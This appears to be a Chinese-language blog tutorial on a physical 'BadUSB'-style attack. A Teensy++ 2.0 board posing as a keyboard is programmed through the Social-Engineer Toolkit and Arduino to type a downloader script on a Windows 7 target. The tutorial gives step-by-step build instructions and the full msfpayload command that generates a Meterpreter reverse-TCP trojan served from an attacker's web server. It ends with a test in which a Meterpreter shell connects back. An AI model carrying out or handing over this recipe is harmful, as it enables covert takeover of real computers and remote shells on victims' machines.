物理攻击之“一插中招”

传统意义上来说，当电脑插入一张CD/DVD光盘，或者一个USB设备，如果自动播放被关闭的话，autorun.inf文件就不能自动执行在这些存储媒介中包含的而已文件。而利用Teensy USB HID，我们能够模拟出一个键盘和鼠标，当插入这个设备时，电脑将识别出一个键盘，利用微处理器和主板的闪存存储空间，就可以发送一组键击命令到目标主机上，进而完全控制目标主机，而不论自动播放是否开启。

1、使用技术
硬件：teensy++2.0
软件：Setoolkit、metasploit、arduino、teensyduino

2、上arduino官网下载1.0.5版本的安装文件（http://arduino.cc/en/Main/Software）

3、下载后解压至自定义位置，进入文件目录后可以可以使用命令“./arduino”运行程序。

4、官方下载teensyduino（下载地址http://www.pjrc.com/teensy/td.download.html），下载后安装。

5、选择arduino的文件目录

6、这一步如果不知道怎么选，就全选吧。

7、安装完成

8、打开arduino1.0.5，选定teensy主板型号。

9、Use Type选项必须选对，否则后面编译会一直报错。我们这里选择模拟鼠标、键盘等输入设备。

10、将teensy++2.0板连接至系统后，基本配置就完成了。接下来使用setoolkit生成arduino可编译的执行脚本。打开setoolkit。

11、选择socail-engineering attack下的arduino-based attack vector

12、选择攻击脚本类型，这里选择“WSCRIPT”。

13、选择攻击向量。针对win7，可以选用meterpreter 64位的反弹马。

14、接下来setoolkit调用msfpayload生成一个刚才指定类型的木马文件，注意文件路径问题！

注意：Setoolkit将生成时间作为文件名，但由于文件名中含有空格，如果直接把文件路径复制到arduino中会被识别为文件夹，最终导致如下图编译错误：

所以light教授这里的建议是先把该文件重命名，再进行导入，为了方便我直接把它重命名并拖到了桌面上：

15、接下就简单了，直接把刚才的pde文件拖到arduino里面。

16、加载成功，但是arduino提示我们代码中含有不能识别的编码，light教授建议使用它的“编码修理”功能升级一下。

17、现在代码没有问题了，我们开始把它写入到teensy里面。依次点击如图的两个图标，进行验证和写入（验证完毕会弹出一个小窗口）。

18、看到下图提示说明已经上传成功，只需最后长按teensy上的按钮即可：（注意是电路板上的物理按钮，不是桌面上小窗口里的按钮！）

按下按钮后小窗口会迅速闪过一下重启完成的提示，表示已经写入ok。现在可以把teensy板拔下来了。

19、回到我们的Setoolkit的窗口，回车后调用msf的监听：

20、最后开启apache服务“service apache2 start”，并在其网站根目录下生成一个名为x.exe的反弹木马文件，命令“msfpayload windows/x64/meterpreter/reverse_tcp LHOST=192.168.198.223 LPORT=443 X > /var/www/x.exe”。（注意参数要与步骤14中的参数相对应）

测试

1、插入teensy后，它会自动打开cmd，并开始写入脚本文件：

2、这个脚本实际上就是个远程马儿下载脚本，在靶机中写入完成后teensy开始执行此脚本。

3、执行完毕后自删除脚本，接着执行下载完成的木马文件。

4、客户端已经弹回meterpreter。